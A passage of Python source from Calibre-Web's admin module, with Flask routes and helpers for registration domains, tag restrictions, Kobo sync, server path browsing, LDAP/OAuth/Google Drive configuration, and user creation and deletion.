config.config_default_role &= ~constants.ROLE_ANONYMOUS
config.config_default_show = sum(int(k[5:]) for k in to_save if k.startswith('show_'))
if "Show_detail_random" in to_save:
config.config_default_show |= constants.DETAIL_RANDOM
config.save()
flash(_(u"Calibre-Web configuration updated"), category="success")
log.debug("Calibre-Web configuration updated")
before_request()
return view_configuration()
@admi.route("/ajax/loaddialogtexts/<element_id>", methods=['POST'])
@login_required
def load_dialogtexts(element_id):
texts = {"header": "", "main": "", "valid": 1}
if element_id == "config_delete_kobo_token":
texts["main"] = _('Do you really want to delete the Kobo Token?')
elif element_id == "btndeletedomain":
texts["main"] = _('Do you really want to delete this domain?')
elif element_id == "btndeluser":
texts["main"] = _('Do you really want to delete this user?')
elif element_id == "delete_shelf":
texts["main"] = _('Are you sure you want to delete this shelf?')
elif element_id == "select_locale":
texts["main"] = _('Are you sure you want to change locales of selected user(s)?')
elif element_id == "select_default_language":
texts["main"] = _('Are you sure you want to change visible book languages for selected user(s)?')
elif element_id == "role":
texts["main"] = _('Are you sure you want to change the selected role for the selected user(s)?')
elif element_id == "restrictions":
texts["main"] = _('Are you sure you want to change the selected restrictions for the selected user(s)?')
elif element_id == "sidebar_view":
texts["main"] = _('Are you sure you want to change the selected visibility restrictions for the selected user(s)?')
elif element_id == "kobo_only_shelves_sync":
texts["main"] = _('Are you sure you want to change shelf sync behavior for the selected user(s)?')
elif element_id == "db_submit":
texts["main"] = _('Are you sure you want to change Calibre library location?')
elif element_id == "btnfullsync":
texts["main"] = _("Are you sure you want delete Calibre-Web's sync database to force a full sync with your Kobo Reader?")
return json.dumps(texts)
@admi.route("/ajax/editdomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def edit_domain(allow):
# POST /post
# name: 'username', //name of field (column in db)
# pk: 1 //primary key (record id)
# value: 'superuser!' //new value
vals = request.form.to_dict()
answer = ub.session.query(ub.Registration).filter(ub.Registration.id == vals['pk']).first()
answer.domain = vals['value'].replace('*', '%').replace('?', '_').lower()
return ub.session_commit("Registering Domains edited {}".format(answer.domain))
@admi.route("/ajax/adddomain/<int:allow>", methods=['POST'])
@login_required
@admin_required
def add_domain(allow):
domain_name = request.form.to_dict()['domainname'].replace('*', '%').replace('?', '_').lower()
check = ub.session.query(ub.Registration).filter(ub.Registration.domain == domain_name)\
.filter(ub.Registration.allow == allow).first()
if not check:
new_domain = ub.Registration(domain=domain_name, allow=allow)
ub.session.add(new_domain)
ub.session_commit("Registering Domains added {}".format(domain_name))
return ""
@admi.route("/ajax/deletedomain", methods=['POST'])
@login_required
@admin_required
def delete_domain():
try:
domain_id = request.form.to_dict()['domainid'].replace('*', '%').replace('?', '_').lower()
ub.session.query(ub.Registration).filter(ub.Registration.id == domain_id).delete()
ub.session_commit("Registering Domains deleted {}".format(domain_id))
# If last domain was deleted, add all domains by default
if not ub.session.query(ub.Registration).filter(ub.Registration.allow == 1).count():
new_domain = ub.Registration(domain="%.%", allow=1)
ub.session.add(new_domain)
ub.session_commit("Last Registering Domain deleted, added *.* as default")
except KeyError:
pass
return ""
@admi.route("/ajax/domainlist/<int:allow>")
@login_required
@admin_required
def list_domain(allow):
answer = ub.session.query(ub.Registration).filter(ub.Registration.allow == allow).all()
json_dumps = json.dumps([{"domain": r.domain.replace('%', '*').replace('_', '?'), "id": r.id} for r in answer])
js = json.dumps(json_dumps.replace('"', "'")).lstrip('"').strip('"')
response = make_response(js.replace("'", '"'))
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/editrestriction/<int:res_type>", defaults={"user_id": 0}, methods=['POST'])
@admi.route("/ajax/editrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def edit_restriction(res_type, user_id):
element = request.form.to_dict()
if element['id'].startswith('a'):
if res_type == 0: # Tags as template
elementlist = config.list_allowed_tags()
elementlist[int(element['id'][1:])] = element['Element']
config.config_allowed_tags = ','.join(elementlist)
config.save()
if res_type == 1: # CustomC
elementlist = config.list_allowed_column_values()
elementlist[int(element['id'][1:])] = element['Element']
config.config_allowed_column_value = ','.join(elementlist)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_allowed_tags()
elementlist[int(element['id'][1:])] = element['Element']
usr.allowed_tags = ','.join(elementlist)
ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.allowed_tags))
if res_type == 3: # CColumn per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_allowed_column_values()
elementlist[int(element['id'][1:])] = element['Element']
usr.allowed_column_value = ','.join(elementlist)
ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name, usr.allowed_column_value))
if element['id'].startswith('d'):
if res_type == 0: # Tags as template
elementlist = config.list_denied_tags()
elementlist[int(element['id'][1:])] = element['Element']
config.config_denied_tags = ','.join(elementlist)
config.save()
if res_type == 1: # CustomC
elementlist = config.list_denied_column_values()
elementlist[int(element['id'][1:])] = element['Element']
config.config_denied_column_value = ','.join(elementlist)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_denied_tags()
elementlist[int(element['id'][1:])] = element['Element']
usr.denied_tags = ','.join(elementlist)
ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.denied_tags))
if res_type == 3: # CColumn per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
elementlist = usr.list_denied_column_values()
elementlist[int(element['id'][1:])] = element['Element']
usr.denied_column_value = ','.join(elementlist)
ub.session_commit("Changed denied columns of user {} to {}".format(usr.name, usr.denied_column_value))
return ""
def restriction_addition(element, list_func):
elementlist = list_func()
if elementlist == ['']:
elementlist = []
if not element['add_element'] in elementlist:
elementlist += [element['add_element']]
return ','.join(elementlist)
def restriction_deletion(element, list_func):
elementlist = list_func()
if element['Element'] in elementlist:
elementlist.remove(element['Element'])
return ','.join(elementlist)
def prepare_tags(user, action, tags_name, id_list):
if "tags" in tags_name:
tags = calibre_db.session.query(db.Tags).filter(db.Tags.id.in_(id_list)).all()
if not tags:
raise Exception(_("Tag not found"))
new_tags_list = [x.name for x in tags]
else:
tags = calibre_db.session.query(db.cc_classes[config.config_restricted_column])\
.filter(db.cc_classes[config.config_restricted_column].id.in_(id_list)).all()
new_tags_list = [x.value for x in tags]
saved_tags_list = user.__dict__[tags_name].split(",") if len(user.__dict__[tags_name]) else []
if action == "remove":
saved_tags_list = [x for x in saved_tags_list if x not in new_tags_list]
elif action == "add":
saved_tags_list.extend(x for x in new_tags_list if x not in saved_tags_list)
else:
raise Exception(_("Invalid Action"))
return ",".join(saved_tags_list)
@admi.route("/ajax/addrestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def add_user_0_restriction(res_type):
return add_restriction(res_type, 0)
@admi.route("/ajax/addrestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def add_restriction(res_type, user_id):
element = request.form.to_dict()
if res_type == 0: # Tags as template
if 'submit_allow' in element:
config.config_allowed_tags = restriction_addition(element, config.list_allowed_tags)
config.save()
elif 'submit_deny' in element:
config.config_denied_tags = restriction_addition(element, config.list_denied_tags)
config.save()
if res_type == 1: # CCustom as template
if 'submit_allow' in element:
config.config_allowed_column_value = restriction_addition(element, config.list_denied_column_values)
config.save()
elif 'submit_deny' in element:
config.config_denied_column_value = restriction_addition(element, config.list_allowed_column_values)
config.save()
if res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if 'submit_allow' in element:
usr.allowed_tags = restriction_addition(element, usr.list_allowed_tags)
ub.session_commit("Changed allowed tags of user {} to {}".format(usr.name, usr.list_allowed_tags()))
elif 'submit_deny' in element:
usr.denied_tags = restriction_addition(element, usr.list_denied_tags)
ub.session_commit("Changed denied tags of user {} to {}".format(usr.name, usr.list_denied_tags()))
if res_type == 3: # CustomC per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if 'submit_allow' in element:
usr.allowed_column_value = restriction_addition(element, usr.list_allowed_column_values)
ub.session_commit("Changed allowed columns of user {} to {}".format(usr.name,
usr.list_allowed_column_values()))
elif 'submit_deny' in element:
usr.denied_column_value = restriction_addition(element, usr.list_denied_column_values)
ub.session_commit("Changed denied columns of user {} to {}".format(usr.name,
usr.list_denied_column_values()))
return ""
@admi.route("/ajax/deleterestriction/<int:res_type>", methods=['POST'])
@login_required
@admin_required
def delete_user_0_restriction(res_type):
return delete_restriction(res_type, 0)
@admi.route("/ajax/deleterestriction/<int:res_type>/<int:user_id>", methods=['POST'])
@login_required
@admin_required
def delete_restriction(res_type, user_id):
element = request.form.to_dict()
if res_type == 0: # Tags as template
if element['id'].startswith('a'):
config.config_allowed_tags = restriction_deletion(element, config.list_allowed_tags)
config.save()
elif element['id'].startswith('d'):
config.config_denied_tags = restriction_deletion(element, config.list_denied_tags)
config.save()
elif res_type == 1: # CustomC as template
if element['id'].startswith('a'):
config.config_allowed_column_value = restriction_deletion(element, config.list_allowed_column_values)
config.save()
elif element['id'].startswith('d'):
config.config_denied_column_value = restriction_deletion(element, config.list_denied_column_values)
config.save()
elif res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if element['id'].startswith('a'):
usr.allowed_tags = restriction_deletion(element, usr.list_allowed_tags)
ub.session_commit("Deleted allowed tags of user {}: {}".format(usr.name, usr.list_allowed_tags))
elif element['id'].startswith('d'):
usr.denied_tags = restriction_deletion(element, usr.list_denied_tags)
ub.session_commit("Deleted denied tags of user {}: {}".format(usr.name, usr.list_allowed_tags))
elif res_type == 3: # Columns per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == int(user_id)).first()
else:
usr = current_user
if element['id'].startswith('a'):
usr.allowed_column_value = restriction_deletion(element, usr.list_allowed_column_values)
ub.session_commit("Deleted allowed columns of user {}: {}".format(usr.name,
usr.list_allowed_column_values))
elif element['id'].startswith('d'):
usr.denied_column_value = restriction_deletion(element, usr.list_denied_column_values)
ub.session_commit("Deleted denied columns of user {}: {}".format(usr.name,
usr.list_denied_column_values))
return ""
@admi.route("/ajax/listrestriction/<int:res_type>", defaults={"user_id": 0})
@admi.route("/ajax/listrestriction/<int:res_type>/<int:user_id>")
@login_required
@admin_required
def list_restriction(res_type, user_id):
if res_type == 0: # Tags as template
restrict = [{'Element': x, 'type':_('Deny'), 'id': 'd'+str(i) }
for i,x in enumerate(config.list_denied_tags()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(config.list_allowed_tags()) if x != '']
json_dumps = restrict + allow
elif res_type == 1: # CustomC as template
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(config.list_denied_column_values()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(config.list_allowed_column_values()) if x != '']
json_dumps = restrict + allow
elif res_type == 2: # Tags per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
else:
usr = current_user
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(usr.list_denied_tags()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(usr.list_allowed_tags()) if x != '']
json_dumps = restrict + allow
elif res_type == 3: # CustomC per user
if isinstance(user_id, int):
usr = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
else:
usr = current_user
restrict = [{'Element': x, 'type': _('Deny'), 'id': 'd'+str(i)}
for i, x in enumerate(usr.list_denied_column_values()) if x != '']
allow = [{'Element': x, 'type': _('Allow'), 'id': 'a'+str(i)}
for i, x in enumerate(usr.list_allowed_column_values()) if x != '']
json_dumps = restrict + allow
else:
json_dumps = ""
js = json.dumps(json_dumps)
response = make_response(js)
response.headers["Content-Type"] = "application/json; charset=utf-8"
return response
@admi.route("/ajax/fullsync")
@login_required
def ajax_fullsync():
count = ub.session.query(ub.KoboSyncedBooks).filter(current_user.id == ub.KoboSyncedBooks.user_id).delete()
message = _("{} sync entries deleted").format(count)
ub.session_commit(message)
return Response(json.dumps([{"type": "success", "message": message}]), mimetype='application/json')
@admi.route("/ajax/pathchooser/")
@login_required
@admin_required
def ajax_pathchooser():
return pathchooser()
def pathchooser():
browse_for = "folder"
folder_only = request.args.get('folder', False) == "true"
file_filter = request.args.get('filter', "")
path = os.path.normpath(request.args.get('path', ""))
if os.path.isfile(path):
oldfile = path
path = os.path.dirname(path)
else:
oldfile = ""
absolute = False
if os.path.isdir(path):
# if os.path.isabs(path):
cwd = os.path.realpath(path)
absolute = True
# else:
# cwd = os.path.relpath(path)
else:
cwd = os.getcwd()
cwd = os.path.normpath(os.path.realpath(cwd))
parentdir = os.path.dirname(cwd)
if not absolute:
if os.path.realpath(cwd) == os.path.realpath("/"):
cwd = os.path.relpath(cwd)
else:
cwd = os.path.relpath(cwd) + os.path.sep
parentdir = os.path.relpath(parentdir) + os.path.sep
if os.path.realpath(cwd) == os.path.realpath("/"):
parentdir = ""
try:
folders = os.listdir(cwd)
except Exception:
folders = []
files = []
for f in folders:
try:
data = {"name": f, "fullpath": os.path.join(cwd, f)}
data["sort"] = data["fullpath"].lower()
except Exception:
continue
if os.path.isfile(os.path.join(cwd, f)):
if folder_only:
continue
if file_filter != "" and file_filter != f:
continue
data["type"] = "file"
data["size"] = os.path.getsize(os.path.join(cwd, f))
power = 0
while (data["size"] >> 10) > 0.3:
power += 1
data["size"] >>= 10
units = ("", "K", "M", "G", "T")
data["size"] = str(data["size"]) + " " + units[power] + "Byte"
else:
data["type"] = "dir"
data["size"] = ""
files.append(data)
files = sorted(files, key=operator.itemgetter("type", "sort"))
context = {
"cwd": cwd,
"files": files,
"parentdir": parentdir,
"type": browse_for,
"oldfile": oldfile,
"absolute": absolute,
}
return json.dumps(context)
def _config_int(to_save, x, func=int):
return config.set_from_dictionary(to_save, x, func)
def _config_checkbox(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: y == "on", False)
def _config_checkbox_int(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: 1 if (y == "on") else 0, 0)
def _config_string(to_save, x):
return config.set_from_dictionary(to_save, x, lambda y: y.strip() if y else y)
def _configuration_gdrive_helper(to_save):
gdrive_error = None
if to_save.get("config_use_google_drive"):
gdrive_secrets = {}
if not os.path.isfile(gdriveutils.SETTINGS_YAML):
config.config_use_google_drive = False
if gdrive_support:
gdrive_error = gdriveutils.get_error_text(gdrive_secrets)
if "config_use_google_drive" in to_save and not config.config_use_google_drive and not gdrive_error:
with open(gdriveutils.CLIENT_SECRETS, 'r') as settings:
gdrive_secrets = json.load(settings)['web']
if not gdrive_secrets:
return _configuration_result(_('client_secrets.json Is Not Configured For Web Application'))
gdriveutils.update_settings(
gdrive_secrets['client_id'],
gdrive_secrets['client_secret'],
gdrive_secrets['redirect_uris'][0]
)
# always show google drive settings, but in case of error deny support
new_gdrive_value = (not gdrive_error) and ("config_use_google_drive" in to_save)
if config.config_use_google_drive and not new_gdrive_value:
config.config_google_drive_watch_changes_response = {}
config.config_use_google_drive = new_gdrive_value
if _config_string(to_save, "config_google_drive_folder"):
gdriveutils.deleteDatabaseOnChange()
return gdrive_error
def _configuration_oauth_helper(to_save):
active_oauths = 0
reboot_required = False
for element in oauthblueprints:
if to_save["config_" + str(element['id']) + "_oauth_client_id"] != element['oauth_client_id'] \
or to_save["config_" + str(element['id']) + "_oauth_client_secret"] != element['oauth_client_secret']:
reboot_required = True
element['oauth_client_id'] = to_save["config_" + str(element['id']) + "_oauth_client_id"]
element['oauth_client_secret'] = to_save["config_" + str(element['id']) + "_oauth_client_secret"]
if to_save["config_" + str(element['id']) + "_oauth_client_id"] \
and to_save["config_" + str(element['id']) + "_oauth_client_secret"]:
active_oauths += 1
element["active"] = 1
else:
element["active"] = 0
ub.session.query(ub.OAuthProvider).filter(ub.OAuthProvider.id == element['id']).update(
{"oauth_client_id": to_save["config_" + str(element['id']) + "_oauth_client_id"],
"oauth_client_secret": to_save["config_" + str(element['id']) + "_oauth_client_secret"],
"active": element["active"]})
return reboot_required
def _configuration_logfile_helper(to_save):
reboot_required = False
reboot_required |= _config_int(to_save, "config_log_level")
reboot_required |= _config_string(to_save, "config_logfile")
if not logger.is_valid_logfile(config.config_logfile):
return reboot_required, \
_configuration_result(_('Logfile Location is not Valid, Please Enter Correct Path'))
reboot_required |= _config_checkbox_int(to_save, "config_access_log")
reboot_required |= _config_string(to_save, "config_access_logfile")
if not logger.is_valid_logfile(config.config_access_logfile):
return reboot_required, \
_configuration_result(_('Access Logfile Location is not Valid, Please Enter Correct Path'))
return reboot_required, None
def _configuration_ldap_helper(to_save):
reboot_required = False
reboot_required |= _config_string(to_save, "config_ldap_provider_url")
reboot_required |= _config_int(to_save, "config_ldap_port")
reboot_required |= _config_int(to_save, "config_ldap_authentication")
reboot_required |= _config_string(to_save, "config_ldap_dn")
reboot_required |= _config_string(to_save, "config_ldap_serv_username")
reboot_required |= _config_string(to_save, "config_ldap_user_object")
reboot_required |= _config_string(to_save, "config_ldap_group_object_filter")
reboot_required |= _config_string(to_save, "config_ldap_group_members_field")
reboot_required |= _config_string(to_save, "config_ldap_member_user_object")
reboot_required |= _config_checkbox(to_save, "config_ldap_openldap")
reboot_required |= _config_int(to_save, "config_ldap_encryption")
reboot_required |= _config_string(to_save, "config_ldap_cacert_path")
reboot_required |= _config_string(to_save, "config_ldap_cert_path")
reboot_required |= _config_string(to_save, "config_ldap_key_path")
_config_string(to_save, "config_ldap_group_name")
if to_save.get("config_ldap_serv_password", "") != "":
reboot_required |= 1
config.set_from_dictionary(to_save, "config_ldap_serv_password", base64.b64encode, encode='UTF-8')
config.save()
if not config.config_ldap_provider_url \
or not config.config_ldap_port \
or not config.config_ldap_dn \
or not config.config_ldap_user_object:
return reboot_required, _configuration_result(_('Please Enter a LDAP Provider, '
'Port, DN and User Object Identifier'))
if config.config_ldap_authentication > constants.LDAP_AUTH_ANONYMOUS:
if config.config_ldap_authentication > constants.LDAP_AUTH_UNAUTHENTICATE:
if not config.config_ldap_serv_username or not bool(config.config_ldap_serv_password):
return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account and Password'))
else:
if not config.config_ldap_serv_username:
return reboot_required, _configuration_result(_('Please Enter a LDAP Service Account'))
if config.config_ldap_group_object_filter:
if config.config_ldap_group_object_filter.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP Group Object Filter Needs to Have One "%s" Format Identifier'))
if config.config_ldap_group_object_filter.count("(") != config.config_ldap_group_object_filter.count(")"):
return reboot_required, _configuration_result(_('LDAP Group Object Filter Has Unmatched Parenthesis'))
if config.config_ldap_user_object.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP User Object Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_user_object.count("(") != config.config_ldap_user_object.count(")"):
return reboot_required, _configuration_result(_('LDAP User Object Filter Has Unmatched Parenthesis'))
if to_save.get("ldap_import_user_filter") == '0':
config.config_ldap_member_user_object = ""
else:
if config.config_ldap_member_user_object.count("%s") != 1:
return reboot_required, \
_configuration_result(_('LDAP Member User Filter needs to Have One "%s" Format Identifier'))
if config.config_ldap_member_user_object.count("(") != config.config_ldap_member_user_object.count(")"):
return reboot_required, _configuration_result(_('LDAP Member User Filter Has Unmatched Parenthesis'))
if config.config_ldap_cacert_path or config.config_ldap_cert_path or config.config_ldap_key_path:
if not (os.path.isfile(config.config_ldap_cacert_path) and
os.path.isfile(config.config_ldap_cert_path) and
os.path.isfile(config.config_ldap_key_path)):
return reboot_required, \
_configuration_result(_('LDAP CACertificate, Certificate or Key Location is not Valid, '
'Please Enter Correct Path'))
return reboot_required, None
@admi.route("/ajax/simulatedbchange", methods=['POST'])
@login_required
@admin_required
def simulatedbchange():
db_change, db_valid = _db_simulate_change()
return Response(json.dumps({"change": db_change, "valid": db_valid}), mimetype='application/json')
def _db_simulate_change():
param = request.form.to_dict()
to_save = {}
to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
param['config_calibre_dir'],
flags=re.IGNORECASE).strip()
db_change = config.config_calibre_dir != to_save["config_calibre_dir"] and config.config_calibre_dir
db_valid = calibre_db.check_valid_db(to_save["config_calibre_dir"], ub.app_DB_path)
return db_change, db_valid
def _db_configuration_update_helper():
db_change = False
to_save = request.form.to_dict()
gdrive_error = None
to_save['config_calibre_dir'] = re.sub(r'[\\/]metadata\.db$',
'',
to_save['config_calibre_dir'],
flags=re.IGNORECASE)
try:
db_change, db_valid = _db_simulate_change()
# gdrive_error drive setup
gdrive_error = _configuration_gdrive_helper(to_save)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
_db_configuration_result(_("Settings DB is not Writeable"), gdrive_error)
try:
metadata_db = os.path.join(to_save['config_calibre_dir'], "metadata.db")
if config.config_use_google_drive and is_gdrive_ready() and not os.path.exists(metadata_db):
gdriveutils.downloadFile(None, "metadata.db", metadata_db)
db_change = True
except Exception as ex:
return _db_configuration_result('{}'.format(ex), gdrive_error)
if db_change or not db_valid or not config.db_configured:
if not calibre_db.setup_db(to_save['config_calibre_dir'], ub.app_DB_path):
return _db_configuration_result(_('DB Location is not Valid, Please Enter Correct Path'),
gdrive_error)
# if db changed -> delete shelfs, delete download books, delete read books, kobo sync...
ub.session.query(ub.Downloads).delete()
ub.session.query(ub.ArchivedBook).delete()
ub.session.query(ub.ReadBook).delete()
ub.session.query(ub.BookShelf).delete()
ub.session.query(ub.Bookmark).delete()
ub.session.query(ub.KoboReadingState).delete()
ub.session.query(ub.KoboStatistics).delete()
ub.session.query(ub.KoboSyncedBooks).delete()
ub.session_commit()
_config_string(to_save, "config_calibre_dir")
calibre_db.update_config(config)
if not os.access(os.path.join(config.config_calibre_dir, "metadata.db"), os.W_OK):
flash(_(u"DB is not Writeable"), category="warning")
config.save()
return _db_configuration_result(None, gdrive_error)
def _configuration_update_helper():
reboot_required = False
to_save = request.form.to_dict()
try:
reboot_required |= _config_int(to_save, "config_port")
reboot_required |= _config_string(to_save, "config_trustedhosts")
reboot_required |= _config_string(to_save, "config_keyfile")
if config.config_keyfile and not os.path.isfile(config.config_keyfile):
return _configuration_result(_('Keyfile Location is not Valid, Please Enter Correct Path'))
reboot_required |= _config_string(to_save, "config_certfile")
if config.config_certfile and not os.path.isfile(config.config_certfile):
return _configuration_result(_('Certfile Location is not Valid, Please Enter Correct Path'))
_config_checkbox_int(to_save, "config_uploading")
_config_checkbox_int(to_save, "config_unicode_filename")
# Reboot on config_anonbrowse with enabled ldap, as decoraters are changed in this case
reboot_required |= (_config_checkbox_int(to_save, "config_anonbrowse")
and config.config_login_type == constants.LOGIN_LDAP)
_config_checkbox_int(to_save, "config_public_reg")
_config_checkbox_int(to_save, "config_register_email")
reboot_required |= _config_checkbox_int(to_save, "config_kobo_sync")
_config_int(to_save, "config_external_port")
_config_checkbox_int(to_save, "config_kobo_proxy")
if "config_upload_formats" in to_save:
to_save["config_upload_formats"] = ','.join(
helper.uniq([x.lstrip().rstrip().lower() for x in to_save["config_upload_formats"].split(',')]))
_config_string(to_save, "config_upload_formats")
constants.EXTENSIONS_UPLOAD = config.config_upload_formats.split(',')
_config_string(to_save, "config_calibre")
_config_string(to_save, "config_converterpath")
_config_string(to_save, "config_kepubifypath")
reboot_required |= _config_int(to_save, "config_login_type")
# LDAP configurator
if config.config_login_type == constants.LOGIN_LDAP:
reboot, message = _configuration_ldap_helper(to_save)
if message:
return message
reboot_required |= reboot
# Remote login configuration
_config_checkbox(to_save, "config_remote_login")
if not config.config_remote_login:
ub.session.query(ub.RemoteAuthToken).filter(ub.RemoteAuthToken.token_type == 0).delete()
# Goodreads configuration
_config_checkbox(to_save, "config_use_goodreads")
_config_string(to_save, "config_goodreads_api_key")
_config_string(to_save, "config_goodreads_api_secret")
if services.goodreads_support:
services.goodreads_support.connect(config.config_goodreads_api_key,
config.config_goodreads_api_secret,
config.config_use_goodreads)
_config_int(to_save, "config_updatechannel")
# Reverse proxy login configuration
_config_checkbox(to_save, "config_allow_reverse_proxy_header_login")
_config_string(to_save, "config_reverse_proxy_login_header_name")
# OAuth configuration
if config.config_login_type == constants.LOGIN_OAUTH:
reboot_required |= _configuration_oauth_helper(to_save)
reboot, message = _configuration_logfile_helper(to_save)
if message:
return message
reboot_required |= reboot
# Rarfile Content configuration
_config_string(to_save, "config_rarfile_location")
if "config_rarfile_location" in to_save:
unrar_status = helper.check_unrar(config.config_rarfile_location)
if unrar_status:
return _configuration_result(unrar_status)
except (OperationalError, InvalidRequestError):
ub.session.rollback()
log.error("Settings DB is not Writeable")
_configuration_result(_("Settings DB is not Writeable"))
config.save()
if reboot_required:
web_server.stop(True)
return _configuration_result(None, reboot_required)
def _configuration_result(error_flash=None, reboot=False):
resp = {}
if error_flash:
log.error(error_flash)
config.load()
resp['result'] = [{'type': "danger", 'message': error_flash}]
else:
resp['result'] = [{'type': "success", 'message':_(u"Calibre-Web configuration updated")}]
resp['reboot'] = reboot
resp['config_upload']= config.config_upload_formats
return Response(json.dumps(resp), mimetype='application/json')
def _db_configuration_result(error_flash=None, gdrive_error=None):
gdrive_authenticate = not is_gdrive_ready()
gdrivefolders = []
if not gdrive_error and config.config_use_google_drive:
gdrive_error = gdriveutils.get_error_text()
if gdrive_error and gdrive_support:
log.error(gdrive_error)
gdrive_error = _(gdrive_error)
flash(gdrive_error, category="error")
else:
if not gdrive_authenticate and gdrive_support:
gdrivefolders = gdriveutils.listRootFolders()
if error_flash:
log.error(error_flash)
config.load()
flash(error_flash, category="error")
elif request.method == "POST" and not gdrive_error:
flash(_("Database Settings updated"), category="success")
return render_title_template("config_db.html",
config=config,
show_authenticate_google_drive=gdrive_authenticate,
gdriveError=gdrive_error,
gdrivefolders=gdrivefolders,
feature_support=feature_support,
title=_(u"Database Configuration"), page="dbconfig")
def _handle_new_user(to_save, content, languages, translations, kobo_support):
content.default_language = to_save["default_language"]
content.locale = to_save.get("locale", content.locale)
content.sidebar_view = sum(int(key[5:]) for key in to_save if key.startswith('show_'))
if "show_detail_random" in to_save:
content.sidebar_view |= constants.DETAIL_RANDOM
content.role = constants.selected_roles(to_save)
content.password = generate_password_hash(to_save["password"])
try:
if not to_save["name"] or not to_save["email"] or not to_save["password"]:
log.info("Missing entries on new user")
raise Exception(_(u"Please fill out all fields!"))
content.email = check_email(to_save["email"])
# Query User name, if not existing, change
content.name = check_username(to_save["name"])
if to_save.get("kindle_mail"):
content.kindle_mail = valid_email(to_save["kindle_mail"])
if config.config_public_reg and not check_valid_domain(content.email):
log.info("E-mail: {} for new user is not from valid domain".format(content.email))
raise Exception(_(u"E-mail is not from valid domain"))
except Exception as ex:
flash(str(ex), category="error")
return render_title_template("user_edit.html", new_user=1, content=content,
config=config,
translations=translations,
languages=languages, title=_(u"Add new user"), page="newuser",
kobo_support=kobo_support, registered_oauth=oauth_check)
try:
content.allowed_tags = config.config_allowed_tags
content.denied_tags = config.config_denied_tags
content.allowed_column_value = config.config_allowed_column_value
content.denied_column_value = config.config_denied_column_value
# No default value for kobo sync shelf setting
content.kobo_only_shelves_sync = to_save.get("kobo_only_shelves_sync", 0) == "on"
ub.session.add(content)
ub.session.commit()
flash(_(u"User '%(user)s' created", user=content.name), category="success")
log.debug("User {} created".format(content.name))
return redirect(url_for('admin.admin'))
except IntegrityError:
ub.session.rollback()
log.error("Found an existing account for {} or {}".format(content.name, content.email))
flash(_("Found an existing account for this e-mail address or name."), category="error")
except OperationalError:
ub.session.rollback()
log.error("Settings DB is not Writeable")
flash(_("Settings DB is not Writeable"), category="error")
def _delete_user(content):
if ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != content.id).count():
if content.name != "Guest":
# Delete all books in shelfs belonging to user, all shelfs of user, downloadstat of user, read status
# and user itself
ub.session.query(ub.ReadBook).filter(content.id == ub.ReadBook.user_id).delete()
ub.session.query(ub.Downloads).filter(content.id == ub.Downloads.user_id).delete()
for us in ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id):
ub.session.query(ub.BookShelf).filter(us.id == ub.BookShelf.shelf).delete()
ub.session.query(ub.Shelf).filter(content.id == ub.Shelf.user_id).delete()
ub.session.query(ub.User).filter(ub.User.id == content.id).delete()
ub.session_commit()
log.info(u"User {} deleted".format(content.name))
return(_(u"User '%(nick)s' deleted", nick=content.name))
else:
log.warning(_(u"Can't delete Guest User"))
raise Exception(_(u"Can't delete Guest User"))
else:
log.warning(u"No admin user remaining, can't delete user")
raise Exception(_(u"No admin user remaining, can't delete user"))
def _handle_edit_user(to_save, content, languages, translations, kobo_support):
if to_save.get("delete"):
try:
flash(_delete_user(content), category="success")
except Exception as ex:
log.error(ex)
flash(str(ex), category="error")
return redirect(url_for('admin.admin'))
else:
if not ub.session.query(ub.User).filter(ub.User.role.op('&')(constants.ROLE_ADMIN) == constants.ROLE_ADMIN,
ub.User.id != content.id).count() and 'admin_role' not in to_save:
log.warning("No admin user remaining, can't remove admin role from {}".format(content.name))
flash(_("No admin user remaining, can't remove admin role"), category="error")
return redirect(url_for('admin.admin'))
if to_save.get("password"):
content.password = generate_password_hash(to_save["password"])
anonymous = content.is_anonymous
